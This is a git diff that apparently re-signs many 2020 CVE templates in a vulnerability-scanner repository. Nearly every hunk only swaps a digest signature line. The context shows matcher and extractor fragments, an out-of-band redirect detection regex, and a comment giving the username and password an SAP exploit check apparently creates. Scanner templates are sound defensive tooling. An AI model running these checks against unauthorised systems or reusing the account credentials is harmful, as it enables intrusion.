4b0a00483046022100a73c869d7f192cb950bb11e43d7567f883710efb18f98876e8e6ff53a23a65b302210091f30aa94c708f64f86578c8f17f01fe6a2524a57792e5c54ac10f750a025c23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 3413c23bbb..5e304db73d 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a0047304502201a053b9e5d1b3b39b3a63962bbb73e3bd1ae057df9bb6bbd8c70a1c54e5c889a022100dbfd8d43414776fb81d37e2acca5ce6f22a4a9ae227720b8a0c06c123a48656b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d90c2eb84256f04b073de463cfb0402ec212dd03ace14707634a33145e8c7fc022100bb8e7cccf338be987caa5eb7b8f1e1ccdf1448480d085010259f5a8992f1d10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 85e049d8b4..93c123a943 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022001a1db1ce282848e286180a36258ba7a97e9ebcfd5e3bf04752665acd1be726002201be28513e9cf09e79f866ea38c6862b1004f5f20e60512c3903a76150fee9ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203865ecc2276affcc6cf8b20d87931b80f7d4bacf7b3d0aff843d100f41bd350202205425c03e757787dae5fd09c05e990376c87d4493772256ddbbf17b39e67ae53d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index d8c4ba738a..5896b0ef90 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a004630440220008f7be9d19095521ee732eedcd00db1cb6c0d5ce2bfc3285e09975ecfb877fd022006d98c7cde4454aff8c6e3c19f73f57edf1f276ad7caf1c2808c837efdfcf07e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca59ace4655ae686646caa3a89197ba7eb18c07a8e640fbce32ecbe06a0702ca022100b9044a541d687ace797222bbea31c02a613a538f54ba347b15d306f0a1398a4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 46bb268528..f6f444031d 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -40,4 +40,4 @@ http: - "get book price failed! You have an error in your SQL syntax" - "Can't retrieve data You have an error in your SQL syntax" condition: or -# digest: 4a0a0047304502206fa2676792b348fc60ebc9cc70b869fe76ef0386dc78c9e96e3249d4a5cfbc370221008c90f9a9894fb5a251d8ebb984a710b6c11de3f64f43f866135bca21ff6b735e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203616fb072b4db2eab9fa478e6dc3f3035f1206cc86adce846dac33d3aca8ec86022007f79e0e1a6b2c0165aeae26da3dc9bd658a410613cfbae403f02293e8cb4c09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index c92d50c413..ded36677e7 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100898e394070c92c7a02d36dcfc81e5aab7fa675d1b34ee54ef3f7b0695240db83022100dc4514faa3631043b8720e95822353c897a7fd577c593cf8dac8ee1b12e9e20e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af70577f267e104380db55128d0e69ec65ffb66e5ec2f85a739c7a661adca17a022100a9dd1bd32a93502c58e0a70e137b8e74b72c3e59922e90aa166862167a52e257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index cf8a6981ad..5be9a529b5 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c39683f83023c2b9b00bc9874ba82f944bb039fd360bd6fb76fa63047038f42302204fadc0b7522f212e1fc2076ac001586a47839a2ae87152a62ae2d8284f7d39f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index e9c731ee45..6590ab0406 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -62,4 +62,4 @@ http: part: header words: - "application/xml" -# digest: 4b0a00483046022100d058bbbb18f9fcaf0793777079b5c78305acfdad26be6dd11135dfa666fb92b60221009914324daf438c22b331865eda5e672cc52bc7a691d94bca7a4eb59450bc5a3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad901c9f50112ffefc10b1c2aea6d266d683320f67f505e6fdfa319e2cadf9320220653da19c0b99e8e9f168a04d16913bd909cd86c04ee31bf7f1615f9a02fca76d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 059e084422..5be55ab58a 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220124a1449183f188b35b4f719c2326afa6646b898b1e01eba50c58b774045f986022100e740bb911aae6f4d5a6af96139596c6f0e7b0ae853d6d324a26b44037b0863c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9404523326339c17c3ff71746265c334d58e211cc335c15fa895b7d6613e1e70220766d0544c32d0e7505acadaeda515a40c27c809b20e054a1b359ac3839c6ae8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index d9eb58a539..28214a9c38 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100916c7a42d0436fc82b9ac530b4662f02687d7d10be9fd214377e261678aa6844022100f4a16d34647bc967921196ede47cf60acaa958982be7b443d8c1a0548c515288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d424f2cf825c04dfaf33f4494b47f051148733c2d41705fd3f9b4e2189cd9f0022100a3204a405b34dce8565e1805a20246458e6d8269cbf706a83a8bf55857661418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 9d5fec6868..85a67310e5 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cf159e65f362247e3e0a65e83c53300c9520bdf1e380765a8409fa22e623af0d02204351e223719946f992f804a11e35bf15d60a75603f57f242a0aab437fb152249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220700626d55f9bb10f64ca0f2d9865a1ed336dd837623298826e4f8959c58b3490022027fa6ac15236194524116e922845bf213e3e8f270aaadc5e3df4d0f7575136cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 355108be0b..a234779ff3 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203db5df7db50e8b1055bb3e76398c0b5656934012adbb9f23a1944b9a36c2754702202109a44766e5fa3aa588f6b3ace938919f8f64a947884f0db7d32f7ed22327f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063f5622a1b04083c7795b0121652061d45b91d971b5658d34f473c49a1eddedd022100cdbca03b4ddc7a090fe79cacab288901f028083051dce67b628525100cf58276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 9398930aac..23c5cf6e86 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 503 -# digest: 4a0a0047304502205820aaf2c8d68c763616b3a1f2410b79857f447e47178528d8734e381ebdfa5702210083e2d7d81bc04ccc7035150e82144ebe4423dec3ae46947f57415373d7131908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041ff8b68e61b4f6bf7f2e768c1fb707a2132aebda523bc60105810042e08a3cf02203541d27a3b548e1ee2d44b7575b006fd03992db6c1028171e66404472cb9d4fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 54a16b4abc..b26d0b6feb 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -92,4 +92,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aaf96da5a395053ea0372436ce504a37792ef36260bedf3723f869204d02cba902210083fd967a9f70ee938de4df948e3283c15e48c9e808d5cb0cc4e2dcbf1be556a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100908ee0877da898c6bd05edac84afbf197f2bd3c652c05de81d682444c91705ac02202f6c10ec85dccbe5220c9db3ccced25575fd4a6c5aa0acd2e6aaa72ddbcdcb63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 0ac3638945..e14c0ca7f5 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e23ab89fad66085d2ab6cb456e4c728a76f6e0356382f5a3dd513a6fd51542b0221009f4227865760ac839ec656f971b5230460f06c7e99b7e78779556b224ce7a7fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eccf4156b2e2e18eb2dbae3fc7603bc29df28024442602931948dded760b785f022100e40a5a478ca7951d3f97fd2e55b23775c28f57b7517e6eb0a14019fe7ffa7db5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index eca65ab4a1..da0022f446 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f10f6390a1f28d284757ba7222f8e714ac03076c664a8120f972e03a1f21b0e022076e4a6fb68aa6b3cf516332820510096fc1215afa44a1de9d081510ecac38195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc211a6f15e2d9da18741daf6c7870c6f5daee34aebda3c2bdd8f28487937b37022100f8bef262549855c3aa8f22f095ad8c63bc1c001f07ab9a155189161908158114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 1b9566f020..7e6308a5a3 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -64,4 +64,4 @@ http: # userName - sapRpoc6351 # password - Secure!PwD8890 -# digest: 490a0046304402206c4b14491ea982f8a08dec5bcee88849e6ebc6b36ce428baa9d12c28e5893bb6022032ff0dcf67cb9db8e3042c6245bb9c3aa286d537c7f1c46e8a741f955b60bcb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed55a6fe121b73240a6bc9d941e925ac76e3af9208538db9a4e0a493b1fec75c022100dd177ebabad849088afff4288e441aba053913f9d1bce107402f073a59d7469d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 84b58f246b..332f8a554d 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018750f0e8502dd291ed8d45bff59f86bec81babc9ea9b413e6447a90544c50de022100ab7a78866d15bc653144d93e47bf47daea15d96bee6b942339ef913d90181e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086573a79c38b4565b7ea2c75147a37a018cdf1924efe5858b5a38210182561ec0220030416009f9312814258733fe6dafd09719c680ac3f88e15633697e2212e99be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 546a4901c2..ee66ec22f5 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "") || contains_all(body, "")' condition: and -# digest: 490a00463044022057bb165b69bcd6a648332fd9637fcd2daef818312700aca402b735e74e3bab7a022039da250736c313317b03ff12fb722f320b0ecfd1338eab919975feb262de5717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abe906a6be65b9c025bc7704c029fb1a4dc0cbfce72a7747b5c7a674e768784a02206828d072af3bad693412d0342d807eb460729dbf0e2ad2a45913aa3775953abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index fed8d4aa02..ff117d3bab 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a98c36c0d43554a80a17b855979ba9b1afd278daecb5f8105fca20d49ac064d4022100b582ef9291592f99197ce65d483f2f18702a4dace55e3b8e7f2fd8626364c8ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b63228ba9f20bbca3a065519c393892647b7fdde35d3cc5088efd66facabcfcd02210086c3a30e6d9a904622edc028b04502f0e8ed9ad7293b1d28c41b2d477cb3a03b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index e74fa6b18e..8311d111ec 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -58,4 +58,4 @@ http: - '"sessionId":"([a-z0-9.]+)"' internal: true part: body -# digest: 4a0a004730450221009f65af7463005817eaf2c8b1d20ecc91865dc0bc33b2e3eb7d8ee11b885a7a7a02207baf70efdf4cb2b174edd1bb6a8c71233fb6f7d3c54f74aa1b93db5446ddb5a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f21a3589f99bf14fc6554b6dffad8b24bfa290932eff97c788ee82cbfbda667022100da8948a7b02d1255b30707f199eb686e5ef751ed789ea86ef814de2f086b6bc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index 0caa7b0e98..6cf5af47c4 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d1cb22987ed6f50f9a8450307b04fb97cb6b3c321c80b9f0488e23e96fcb37f02204df7d0479846817a8336b7fcafe8afda2777f7e03883335b649b88afa68341cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb60eb2a7ed8164d33e50962d0d82ae90c32969b89bad729bd3f36a4fb228926022100fd28bd5d7df38adc079263e18d7e3460bab67a6f697c8df2237f9765b19576ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 67780e7931..a94955d0cc 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100c32049f90bd86f8d7752cf970acd2afd5150fb0a7d5ffd4b42477b733a9fdb0c022100ad42c6fbacd75f19232f08f7c3590d37f61dc7931ccc81dd74992232dd9633e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100863add007d17d603e60419b217e08c75160f9acae86361fd0935f1056ba9c4310220387cc7b5f8836dc5d8a20c7ae91fe8f60c3b467b3eab8cf5105e8d64bff9ce47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index f731983123..6411901d2f 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206792db6fdd8e464da8351b87ddbba9a963f88f46d4f033c091fe6c389244575d022100fba0ea89c7927a275a26e5c8af022bbc1396176d3062c626ebf54a7fd9215679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1666bc4bb4986e4dce6f31b2c1484850d1bc0905ac7ad4b1953b7581b1fe21d022100d616636f1f8420750a310f2dcee88eca1f793859493d8ebd0a3bb2062c64b495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index f125c68bcf..a7628b92cc 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -63,4 +63,4 @@ http: - "Microsoft Windows (.*)" - "Distributor ID: (.*)" part: body -# digest: 4a0a00473045022071f597a8c75493532cfd3eaadfa6c8bbcaea6a87a45925358b9bcc0a50aa1d86022100c8b38b6ee54a0e95d8f18b3065c202b3f8f14b17ed17622dc24bb8b61577b3f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b078ca58bc844a1032faebb69311a2fcb83c43a69c3d4283d7e2083fb72ef1b02207a29a7d6998b92d145c1834995eafac96c2f949ccc27157b60dec4a7fd509034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 758004ac96..506042020a 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031d1966241ed308968ef852360775530e3798312c51bffd3e2011ddff009f30d0220601bed4b817baee1e1404f921e52a663759eec3f11e4a03015b7cb839fa416e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009feeceef542c46a8cfdd7536e65c7febb80c5c9894b5b3f479c7231e51eb7052022035045f855c47d58f4c2a3114b4f144d05ba0b35256c280a03c424591d29b44be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index c5e4150a32..80dc34b36e 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202281c77cd44460978380c0e81c7ecb788518a1ef2891f50395a869f5afffae68022100a72bc525d6b1e771166cc67870ec31fe56551193440b4622c8652b3c5510ff13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa784325a075212b3ce0376865f96c93c378ab99f4faeab9555776ec9f016c8f02200d54da34c1a8855ddf5491aee9b943191c45503351855984c257397f86a7b24f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 9a73648b69..3d53164f26 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210095f2004035f79cbcb4af27718650ade78e8f25da899e3692309e6ddbcfe39faa022059a57f2c0fa7b3f659a52948e81555e06688f8163061909b9c5647d723f90de6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220623563b3e9081c12b53bbcd5971946c9c090aae5e094e9ee713197bf3a3adc310221008128e62b99d5783f3471f785906e2c3b866514cad77898df0bd2c10a326a190b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index ea8b81d24a..23f89efcde 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024dcfb977f8e9977d9363d303d40f2267b3a85036968987ab62443171eef46a4022100c4694949e1496753150bcac302501f45335d93836cd76f7569f8af58e2992340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206617e4956f9404435cacd0175a72eb6deb5b1eead694622dc445086a67a221db022072a353f4336bd25c50f2cafca5951b2056e8b0e4937b2ae92d665df184f60d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 693f102373..9939732f02 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -80,4 +80,4 @@ http: - "(?m)[0-9]{3,10}\\.[0-9]+" internal: true part: body -# digest: 4a0a0047304502200a40fbcd2be6f6e3f74c8672c222c2fb30213a6ad086641b213481f80ad09f66022100d1466bbe3255aaff3b150fda8bf77ec553d990b3079a9573e835cf7273d4accf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d40bce3020167c49d51e3597d35490d58001b7b365f70f80196485665f264fd302200691364c0a37cea8c22c160ef5e40058241e48c8d290d590a897ea7c095e8a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 78f9a297ff..f5192bfd3e 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af1818c7f41234374edabf5cb8c41a1f1f2b0006f1ad792cc58aa2617de103160220625f87c03f8a6d85ac8db0b8598f26a7b1324d62edd1e9420071b0d8c83e2610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220525b0394b9d3a28ef8154f941916bbd498f3cdbe8f8a1f5b006ba60e63d2f8b3022100e2246c5df27c07e8483bda40820890e1c9465dc46f0b26a5a28304d4c9780775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index c67bd036a0..e68eb53a12 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220144c263851998fa91377497074b757f9895d6aeea41149f1d411839b7f4a5d71022100f6ac53a3009610178242836e265a702b8c72cedd972b57d420d924c438483336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e97d1bee3987941ccf2372d28ac983dac0ffa6d92d7cf641482f98a5e6bcfdb6022100f340b0edbabef04b09a3442c2045a18383ddb00569e52f9e03b1fbfee9d23d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index fe8f69eb47..3935254e22 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206d0846edf7e8e6118bd01670c01706ad026f58b9b53ef7cd70a6606c4c693f6d02206b183f00c8643042b064c49c928b48fd987a03476c663cd827dd563793cf11ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc8898ae7a0980f4243804b7ff22a9b8ff38f04d83718dccf79985b33619939b022100dd4fee008abfab68aef6ab24b8f04ea785c96f5ab20dd884b031316f2aef002f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 0c2c04062a..5e053f6840 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -60,4 +60,4 @@ http: - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100de6de457bb118ab6c4d6b4b82ab6c8ff87768dddd14a369a687a3192e06b4e57022100b77038f1401cb94826ab4e530bebe15addac7087506d0fb7356d04f7c66468f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002690dda68624c701141ce244fde09b3ae3756aabb82fc252b5ab8b9fede8d59022100f97d870328ce4b27454781d44526befd0aa74459a07e4121c04a578338d9da24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index d8934eccdd..38542e754b 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d1ececd05341a5a1bef5c9da1c0dfda7428c31f46f8abe790aa333141dc7004e022100c929cd89b883f1951676f34e2109adfac476702f5883f91216e42df3df792754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090e3d7f58b6d051bba34a7f85dd0a9d86c32a96e9deef39025d3169838daf78c02201e61d3f1f2704140a962c8563bc75ccb38d7009c0dec06fb5fadb07aaf0cd6ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 692a91b3ba..77d2ba8bbb 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -65,4 +65,4 @@ http: - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input attribute: value part: body -# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8a0aa9b72c7bcd55f9163162b0bd8f9fb7a6ca107e55a46fa5b22f42ff1d194022100c8e13cd8e692b9430c30e0ffd48feda71f8863a9947a6454d0082f1b3ef8b598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index d3fe2585a3..d9ed1fa1a2 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -80,4 +80,4 @@ http: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' internal: true part: header -# digest: 490a0046304402203291fcf479be6ac8ef870d1f4d03c92df6410ee75121d38addd0c9377d8f40f7022020886d69171d32958ad6b8f1d435f68f1521494a7169dedcee8a8830052aa695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 